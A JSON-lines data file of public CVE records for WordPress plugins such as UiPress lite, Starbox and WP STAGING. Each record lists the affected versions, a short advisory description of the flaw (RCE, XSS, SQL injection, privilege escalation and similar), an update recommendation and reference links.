{"CVE_ID":"CVE-2025-3053","slug":"uipress-lite","versionImpact":"3.5.07","versionEndExcluding":"3.5.08","description":"The UiPress lite | Effortless custom dashboards, admin themes and pages plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.5.07 via the uip_process_form_input() function. This is due to the function taking user supplied inputs to execute arbitrary functions with arbitrary data, and does not have any sort of capability check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary code on the server.","recommendation":"Update to version 3.5.08, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292552\\\/uipress-lite\\\/trunk\\\/admin\\\/core\\\/ajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292552\\\/uipress-lite\\\/trunk\\\/admin\\\/core\\\/ajax-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6717adb0-27bc-4cd4-8c34-bea59bc0e016?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6717adb0-27bc-4cd4-8c34-bea59bc0e016?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1309","slug":"uipress-lite","versionImpact":"3.5.04","versionEndExcluding":"3.5.05","description":"The UiPress lite | Effortless custom dashboards, admin themes and pages plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the uip_save_form_as_option() function in all versions up to, and including, 3.5.04. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.5.05, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uipress-lite\\\/tags\\\/3.5.00\\\/admin\\\/core\\\/ajax-functions.php#L625\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uipress-lite\\\/tags\\\/3.5.00\\\/admin\\\/core\\\/ajax-functions.php#L625\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249865\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249865\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6754ba34-0dc7-40a5-9548-a5f77db0df53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6754ba34-0dc7-40a5-9548-a5f77db0df53?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1056","slug":"funnel-builder-pro","versionImpact":"3.4.5","versionEndExcluding":"3.5.0","description":"The FunnelKit Funnel Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allow_iframe_tag_in_post' function which uses the 'wp_kses_allowed_html' filter to globally allow script and iframe tags in posts in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/myaccount.funnelkit.com\\\/changelog\\\/changelog-funnel-builder-pro\\\/?v=7516fd43adaa\",\"name\":\"https:\\\/\\\/myaccount.funnelkit.com\\\/changelog\\\/changelog-funnel-builder-pro\\\/?v=7516fd43adaa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4469","slug":"wp-staging","versionImpact":"3.4.3","versionEndExcluding":"3.5.0","description":"The WP STAGING WordPress Backup Plugin  WordPress plugin before 3.5.0 does not prevent users with the administrator role from pinging conducting SSRF attacks, which may be a problem in multisite configurations.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6b1270b-52c0-471d-a5fb-507e21b46310\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6b1270b-52c0-471d-a5fb-507e21b46310\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6806","slug":"starbox","versionEndExcluding":"3.5.0","description":"The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Job Settings user profile fields in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f413fc2-8543-4478-987d-d983581027bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f413fc2-8543-4478-987d-d983581027bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029599\\\/starbox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029599\\\/starbox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4665","slug":"eventprime-event-calendar-management","versionImpact":"3.4.9","versionEndExcluding":"3.5.0","description":"The EventPrime  WordPress plugin before 3.5.0 does not properly validate permissions when updating bookings, allowing users to change\/cancel bookings for other users. Additionally, the feature is lacking a nonce.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50b78cac-cad1-4526-9655-ae0440739796\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50b78cac-cad1-4526-9655-ae0440739796\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0256","slug":"starbox","versionImpact":"3.4.8","versionEndExcluding":"3.5.0","description":"The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Profile Display Name and Social Settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029599\\\/starbox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029599\\\/starbox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9546","slug":"wpide","versionImpact":"3.4.9","versionEndExcluding":"3.5.0","description":"The WPIDE \u2013 File Manager & Code Editor plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.4.9. This is due to the plugin utilizing the PHP-Parser library, which outputs parser rebuild command execution results. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e884af8b-c83f-4380-bfaf-f1419fce125c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e884af8b-c83f-4380-bfaf-f1419fce125c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpide\\\/tags\\\/3.4.9\\\/vendor\\\/nikic\\\/php-parser\\\/grammar\\\/rebuildParsers.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpide\\\/tags\\\/3.4.9\\\/vendor\\\/nikic\\\/php-parser\\\/grammar\\\/rebuildParsers.php#L77\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3412","slug":"wp-staging","versionImpact":"3.4.3","versionEndExcluding":"3.5.0","description":"The WP STAGING WordPress Backup Plugin \u2013 Migration Backup Restore plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the wpstg_processing AJAX action in all versions up to, and including, 3.4.3. This makes it possible for authenticated attackers, with administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ebb1072-ea05-4914-961d-0d8f20248078?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ebb1072-ea05-4914-961d-0d8f20248078?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076275\\\/wp-staging\\\/trunk\\\/Framework\\\/Network\\\/AjaxBackupDownloader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076275\\\/wp-staging\\\/trunk\\\/Framework\\\/Network\\\/AjaxBackupDownloader.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1273","slug":"starbox","versionImpact":"3.4.9","versionEndExcluding":"3.5.0","description":"The Starbox WordPress plugin before 3.5.0 does not sanitise and escape some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks","recommendation":"Update to version 3.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9784d7c8-e3aa-42af-ace8-5b2b37ebc9cb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9784d7c8-e3aa-42af-ace8-5b2b37ebc9cb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10105","slug":"ip-blacklist-cloud","versionEndExcluding":"3.43","description":"A vulnerability, which was classified as critical, was found in IP Blacklist Cloud Plugin up to 3.42 on WordPress. This affects the function valid_js_identifier of the file ip_blacklist_cloud.php of the component CSV File Import. The manipulation of the argument filename leads to path traversal. It is possible to initiate the attack remotely. Upgrading to version 3.43 is able to address this issue. The name of the patch is 6e6fe8c6fda7cbc252eef083105e08d759c07312. It is recommended to upgrade the affected component. The identifier VDB-227757 was assigned to this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/ip-blacklist-cloud\\\/releases\\\/tag\\\/3.43\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/ip-blacklist-cloud\\\/releases\\\/tag\\\/3.43\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227757\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227757\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/ip-blacklist-cloud\\\/commit\\\/6e6fe8c6fda7cbc252eef083105e08d759c07312\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/ip-blacklist-cloud\\\/commit\\\/6e6fe8c6fda7cbc252eef083105e08d759c07312\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227757\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227757\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9231","slug":"wp-members","versionImpact":"3.4.9.5","versionEndExcluding":"3.4.9.6","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.9.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d59e599-59da-4c03-b71f-d00a078b2442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d59e599-59da-4c03-b71f-d00a078b2442?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.4.9.5\\\/includes\\\/class-wp-members.php#L1960\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.4.9.5\\\/includes\\\/class-wp-members.php#L1960\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.4.9.5\\\/includes\\\/class-wp-members-forms.php#L2198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.4.9.5\\\/includes\\\/class-wp-members-forms.php#L2198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172354\\\/wp-members\\\/trunk\\\/includes\\\/class-wp-members-forms.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172354\\\/wp-members\\\/trunk\\\/includes\\\/class-wp-members-forms.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1987","slug":"wp-members","versionImpact":"3.4.9.1","versionEndExcluding":"3.4.9.2","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.4.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/631e1061-50b1-4df2-b876-37b4cd3e2478?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/631e1061-50b1-4df2-b876-37b4cd3e2478?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3047285%40wp-members%2Ftrunk&old=3025452%40wp-members%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3047285%40wp-members%2Ftrunk&old=3025452%40wp-members%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4685","slug":"gutentor","versionImpact":"3.4.8","versionEndExcluding":"3.4.9","description":"The Gutentor \u2013 Gutenberg Blocks \u2013 Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML data attributes of multiple widgets, in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320485\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320485\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9ec6af-fa51-4e14-abf6-450c1ca6f8d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9ec6af-fa51-4e14-abf6-450c1ca6f8d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0366","slug":"starbox","versionImpact":"3.4.7","versionEndExcluding":"3.4.8","description":"The Starbox \u2013 the Author Box for Humans plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.4.7 via the action function due to missing validation on a user controlled key. This makes it possible for subscribers to view plugin preferences and potentially other user settings.","recommendation":"Update to version 3.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/starbox\\\/trunk\\\/core\\\/UserSettings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/starbox\\\/trunk\\\/core\\\/UserSettings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028775\\\/starbox\\\/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028775\\\/starbox\\\/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11180","slug":"elementskit-lite","versionImpact":"3.4.7","versionEndExcluding":"3.4.8","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Timer Widget ekit_countdown_timer_title parameter in all versions up to, and including, 3.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190501\\\/elementskit-lite\\\/trunk\\\/widgets\\\/countdown-timer\\\/countdown-timer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190501\\\/elementskit-lite\\\/trunk\\\/widgets\\\/countdown-timer\\\/countdown-timer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262976\\\/elementskit-lite\\\/trunk\\\/widgets\\\/init\\\/assets\\\/js\\\/elementor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262976\\\/elementskit-lite\\\/trunk\\\/widgets\\\/init\\\/assets\\\/js\\\/elementor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35969379-e668-4045-8de7-696f196ba5b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35969379-e668-4045-8de7-696f196ba5b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9374","slug":"terms-descriptions","versionImpact":"3.4.6","versionEndExcluding":"3.4.7","description":"The Terms descriptions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa977e6c-6b9d-4fa8-99f3-566d6a71424f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa977e6c-6b9d-4fa8-99f3-566d6a71424f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/terms-descriptions\\\/trunk\\\/includes\\\/td_admin_terms.php#L520\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/terms-descriptions\\\/trunk\\\/includes\\\/td_admin_terms.php#L520\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2572","slug":"survey-maker","versionEndExcluding":"3.4.7","description":"The Survey Maker WordPress plugin before 3.4.7 does not escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f7fe6e6-c3d0-4e27-8222-572d7a420153\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f7fe6e6-c3d0-4e27-8222-572d7a420153\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6836","slug":"funnel-builder","versionImpact":"3.4.6","versionEndExcluding":"3.4.7","description":"The Funnel Builder for WordPress by FunnelKit \u2013 Customize WooCommerce Checkout Pages, Create Sales Funnels, Order Bumps & One Click Upsells plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple functions in all versions up to, and including, 3.4.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to update multiple settings, including templates, designs, checkouts, and other plugin settings.","recommendation":"Update to version 3.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9022afe-0c79-413b-ac0a-a1d32ec09619?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9022afe-0c79-413b-ac0a-a1d32ec09619?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/trunk\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-ajax-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/trunk\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-ajax-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123202\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123202\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1986","slug":"gutentor","versionImpact":"3.4.6","versionEndExcluding":"3.4.7","description":"The Gutentor  WordPress plugin before 3.4.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 3.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1414750-19ee-4a5d-b255-a9c20168b716\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1414750-19ee-4a5d-b255-a9c20168b716\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4546","slug":"custom-post-type-pdf-attachment","versionImpact":"3.4.5","versionEndExcluding":"3.4.6","description":"The Custom Post Type Attachment plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pdf_attachment' shortcode in all versions up to, and including, 3.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6ba2907-36f4-4c4d-9e25-d13d32e28690?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6ba2907-36f4-4c4d-9e25-d13d32e28690?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087121\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087121\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0979","slug":"dashboard-widgets-suite","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The Dashboard Widgets Suite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 3.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe4d99c-9cbd-4255-8f90-f904313d46b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe4d99c-9cbd-4255-8f90-f904313d46b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3101348%40dashboard-widgets-suite&new=3101348%40dashboard-widgets-suite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3101348%40dashboard-widgets-suite&new=3101348%40dashboard-widgets-suite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6553","slug":"wp-meteor","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The WP Meteor Website Speed Optimization Addon plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.4.3.This is due to the plugin utilizing wpdesk and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6197c194-5a17-41da-be79-58a6f5c68a0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6197c194-5a17-41da-be79-58a6f5c68a0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117899%40wp-meteor&new=3117899%40wp-meteor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117899%40wp-meteor&new=3117899%40wp-meteor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1320","slug":"eventprime-event-calendar-management","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'offline_status' parameter in all versions up to, and including, 3.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e82e1c5-0ed4-4dee-9990-976591693eb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e82e1c5-0ed4-4dee-9990-976591693eb5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
